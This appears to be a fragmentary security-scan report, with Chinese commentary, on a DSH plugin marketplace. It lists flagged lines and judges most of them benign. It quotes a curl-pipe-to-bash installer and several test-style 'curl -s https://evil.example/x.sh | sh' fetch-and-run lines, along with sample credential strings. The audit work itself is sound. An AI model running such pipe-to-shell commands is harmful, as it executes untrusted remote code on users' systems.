6curl -sL https://raw.githubusercontent.com/bradeGithub/DSH-Plugins-Marketplace/main/install.sh | bash
该行为README/注释中展示的推荐一键安装命令,是插件'一键安装'能力的入口,脚本内部还优先尝试官方 dsh CLI 安装,非隐蔽执行。
面向 GitHub dsh-plugin 话题的插件与技能市场:设置页内逛自动收录的全量索引(CI 每 2 小时刷新),一键安装带类型识别、安装脚本与宿主依赖遮蔽安全检查、环境变量密钥管理,并附 STANDARD.md 识别层规范。
该插件为 DSH 插件市场,声明功能为浏览/安装带 dsh-plugin 话题的第三方插件并做安全检查。两条命中均为静态规则的误报式高风险标记:lib/index.js 中的 env 读取实为主动过滤敏感变量的安全机制(sanitized);scripts 目录下的探测脚本使用 GITHUB_TOKEN 仅是构建期向 GitHub 官方 API 鉴权,属于正常功能用途(functional),非运行时插件对用户凭据的滥用。整体代码行为与声明意图一致,需用户注意的是 cordis.patch.yml 将插件注入 webServer,但该补丁本身未涉及凭据或网络异常外泄。
6curl -sL https://raw.githubusercontent.com/bradeGithub/DSH-Plugins-Marketplace/main/install.sh | bash
该行为README/注释中展示的推荐一键安装命令,是插件'一键安装'能力的入口,脚本内部还优先尝试官方 dsh CLI 安装,非隐蔽执行。
52credential access at line 52 + outbound network at line 109
TOKEN 取自 GITHUB_TOKEN/GH_TOKEN,仅用于向 GitHub Search/Contents API 发起认证请求以构建插件索引,符合'CI每2小时刷新全量索引'的声明用途。
32credential access at line 32 + outbound network at line 41
verify-installability.mjs 是构建期探测脚本,tokenOf() 读取 GITHUB_TOKEN/GH_TOKEN 仅用于向 GitHub 官方 API(fetch 调用)鉴权探测仓库结构,凭据流向与其归属服务一致。
1spawnSync
1node:child_process
9execFileSync
9node:child_process
14execFileSync
14node:child_process
30spawnSync
30node:child_process
17execFileSync
17node:child_process
1npm repository=git+https://github.com/Scorp1o117/dsh-plugin-marketplace.git ≠ bradegithub/dsh-plugins-marketplace
31curl|bash
install.sh:31 只是注释文字'curl|bash 模式 = 无路径',用于说明下载分支逻辑,并非实际的 curl|bash 执行代码。
12execFileSync
12node:child_process
833curl | sh
837curl -s https://evil.example/x.sh | sh
16execFileSync
16node:child_process
13execFileSync
13spawnSync
10spawnSync
10node:child_process
813node:child_process
1355curl -s https://evil.example/x.sh | sh
1362curl -s https://evil.example/x.sh | sh
262AKIAIOSFODNN7EXAMPLE
77Buffer.from(typeof payload === "string" ? payload : JSON.stringify(payload)), }; }; return { orig, bodies }; } (async () => { const lib = await import(
14execFileSync
14node:child_process
10execFileSync
10node:child_process
38glpat-AbCdEfGhIjKlMnOpQrSt
38glpat-AbCdEfGhIjKlMnOpQrSt
76spawnSync
80spawnSync
123credential access at line 123 + outbound network at line 331
buildMinimalEnv 仅从 SCRIPT_ENV_KEYS 白名单(PATH/HOME 等非敏感系统变量)读取 process.env,且与之配套的 buildFilteredEnv 用 isSensitiveEnvKey 主动剔除 TOKEN/KEY/SECRET 等敏感变量,未接触真实凭据。
[](https://dshmod.com/plugins/bradegithub-dsh-plugins-marketplace)